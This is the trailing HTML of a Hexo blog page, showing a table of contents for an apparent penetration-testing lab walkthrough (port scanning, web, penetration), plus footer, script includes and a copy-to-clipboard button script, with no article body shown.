              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-查看IP地址"><span class="nav-text">1. 查看IP地址</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-扫描靶机端口"><span class="nav-text">2. 扫描靶机端口</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-Web"><span class="nav-text">3. Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-另一种思路"><span class="nav-text">3.1 另一种思路</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-渗透"><span class="nav-text">4. 渗透</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-总结"><span class="nav-text">5. 总结</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-参考"><span class="nav-text">6. 参考</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">chessur</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.1.1</div>




        








        
      </div>
    </footer>

    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/affix.js?v=7.1.1"></script>

  <script src="/js/schemes/pisces.js?v=7.1.1"></script>




  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  
<script>
  $('.highlight').not('.gist .highlight').each(function(i, e) {
    var $wrap = $('<div>').addClass('highlight-wrap');
    $(e).after($wrap);
    $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function(e) {
      var code = $(this).parent().find('.code').find('.line').map(function(i, e) {
        return $(e).text();
      }).toArray().join('\n');
      var ta = document.createElement('textarea');
      var yPosition = window.pageYOffset || document.documentElement.scrollTop;
      ta.style.top = yPosition + 'px'; // Prevent page scroll
      ta.style.position = 'absolute';
      ta.style.opacity = '0';
      ta.readOnly = true;
      ta.value = code;
      document.body.appendChild(ta);
      ta.select();
      ta.setSelectionRange(0, code.length);
      ta.readOnly = false;
      var result = document.execCommand('copy');
      
        if (result) $(this).text('Copied');
        else $(this).text('Copy failed');
      
      ta.blur(); // For iOS
      $(this).blur();
    })).on('mouseleave', function(e) {
      var $b = $(this).find('.copy-btn');
      setTimeout(function() {
        $b.text('Copy');
      }, 300);
    }).append(e);
  })
</script>


  

  

</body>
</html>
